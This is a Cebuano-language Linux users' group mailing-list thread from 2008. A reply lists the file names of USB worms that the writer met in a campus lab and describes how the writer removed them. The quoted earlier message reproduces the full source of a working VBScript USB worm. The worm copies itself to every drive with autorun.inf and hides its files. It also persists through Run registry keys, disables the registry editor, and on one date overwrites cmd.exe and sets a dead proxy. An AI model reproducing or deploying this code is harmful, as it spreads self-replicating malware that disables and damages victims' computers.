sa ako nabaw-an.. taga Quezon, Manila gahimo sa TTMS...
which is arch is right.. ang original kay...
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title", "I AM NOT A CORRUPT LIKE YOU"
hmmm... naa pod Funny UST scandal thingy ani... daghan man... mao mani uso
karon... scripts na pangsinamok lang sa computer, pakamang sa computer na di
ma detect sa anti-virus... mostly kay VB....
list ani nila sa akong na encounter sa XU internet lab kay...
autorun.*
TTM*.*
Desktop.*
imgkulot*.*
RECYCLER\INFO.exe
RECYCLER\RECYCLER.exe
RECYCLER\Desktop.ini
sysdll.exe
krag.exe
RavMon*.*
msv*.dll
scvhosts.exe
scvhost.exe
svhost.exe
C:\Windows\svhost.exe
C:\Windows\svhost32.exe
"New Folder".exe
"Funny UST Scandal.avi.exe"
smss.exe
jay.exe
transmit.exe
isetup.exe
most sila ga kalat kay sa flashdisk... naka hidden files, system files and
read-only files....
then time to time.. ga usab ila name.. then ga improve ila pag kamang...
last worst encounter nako kay even imo na gi safe mode, nag dagan gihapon
sya... balig naka system na sya... even imo na gi delete sa regedit kay naa
gihapon sya... msconfig, naa gihapon. ang last nako gibuhat kay gi delete
nako ang mga RECYCLER sa tanan drive nako.. kay didto man sila diay gatago..
hehehehehe... so solve na dayun.. :)
amen...
===================================
On 2/12/08, Ron Michael Khu <[EMAIL PROTECTED]> wrote:
>
> Obviously this is offtopic, since the guy's script can only
> run in an OS which supports regedit.exe, wscript.exe and the
> other MS-apps.
>
> Choi gihapon ni iyang gibuhat... mo traverse sa tanan flashdrives
> and then copy itself to them :D
>
> pretty harmless compared to the other naught scripts but nonetheless
> still annoying :D
>
>
> "DOHHGS Ni TAGA CDOC"
>
> Who wants to claim ownership for this script?
> :D
>
> any takers?
>
>
> ---------------------------------------------------------------------------------------
> 'THIS IS A MODIFIED VERSION BY: TTMS
> 'PROUD TO BE FILIPINO, NOT TO CORRUPTION!
>
> On Error Resume Next
>
> Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath,
> flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd
>
> mycmdfile = "cmd.exe"
>
> mydate = month(now()) & day(now())
> myvbsalias = "TTMS" & mydate
> myvbsfile = myvbsalias & ".dll.vbs"
>
> atr = "[autorun]" & vbCrLf & _
> "shellexecute=wscript.exe " & myvbsfile
>
> Set fs = CreateObject("Scripting.FileSystemObject")
>
> Dim mf, text, size
>
> Set mf = fs.GetFile(WScript.ScriptFullname)
>
> size = mf.size
> check = mf.Drive.drivetype
>
> Set text = mf.openastextstream(1, -2)
>
> Do While Not text.atendofstream
> mysource = mysource & text.readline
> mysource = mysource & vbCrLf
> Loop
>
> Do
> Set winpath = fs.GetSpecialFolder(0)
>
> Set tf = fs.GetFile(winpath & "\" & myvbsfile)
>
> tf.Attributes = 32
>
> Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True)
>
> tf.Write mysource
> tf.Close
>
> Set tf = fs.GetFile(winpath & "\" & myvbsfile)
>
> tf.Attributes = 39
>
> If (mydate = "318") Then
> Set winsyspath = fs.GetSpecialFolder(1)
>
> cmd = "@echo off" & vbCrLf & _
> "wscript " & winpath & "\" & myvbsfile
>
> Set tf = fs.GetFile(winsyspath & "\" & mycmdfile)
>
> tf.Attributes = 32
>
> Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2)
>
> tf.Write cmd
> tf.Close
>
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
> Settings\ProxyEnable", 1, "REG_DWORD"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
> Settings\ProxyServer", "0.0.0.0:80"
>
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control
> Panel\Connection Settings\Connwiz Admin Lock", 1, "REG_DWORD"
> End If
>
> For Each flashdrive In fs.drives
> If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And
> flashdrive.Path <> "A:" Then
> Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
>
> tf.Attributes = 32
>
> Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile,
> 2, True)
>
> tf.Write mysource
> tf.Close
>
> Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
>
> tf.Attributes = 39
>
> Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
>
> tf.Attributes = 32
>
> Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf", 2,
> True)
>
> tf.Write atr
> tf.Close
>
> Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
>
> tf.Attributes = 39
> End If
> Next
>
> Set rg = CreateObject("WScript.Shell")
>
> rg.RegWrite
>
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
> 1, "REG_DWORD"
>
> rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> Explorer\Main\Window Title", "DOHHGS Ni TAGA CDOC WARNING GUBA NA IMO PC"
>
> rg.RegWrite
>
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\MSConfig",
> winpath & "\" & myvbsfile
> rg.RegWrite
>
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSConfig",
> winpath & "\" & myvbsfile
>
>
> If check <> 1 Then
> WScript.sleep 200000
> End If
>
> Loop While (check <> 1)
>
> Set sd = CreateObject("WScript.Shell")
>
> sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname
>
> _________________________________________________
> Kagay-Anon Linux Users' Group (KLUG) Mailing List
> [email protected] (http://cdo.linux.org.ph)
> Searchable Archives: http://archives.free.net.ph
>
--
--------------------
http://www.metacatalyst.com
http://www.metacatalyst.org
http://www.zabyer.org
Got my Own Hacker Key:
v3sw3BHhw5ln2pr5OFPck3ma2u4MLw5XVm+5l5UCi5Ne4t3b5en5g5RaIs5MSr3p2
http://www.hackerkey.com
Registered Linux User: #439468
_________________________________________________
Kagay-Anon Linux Users' Group (KLUG) Mailing List
[email protected] (http://cdo.linux.org.ph)
Searchable Archives: http://archives.free.net.ph
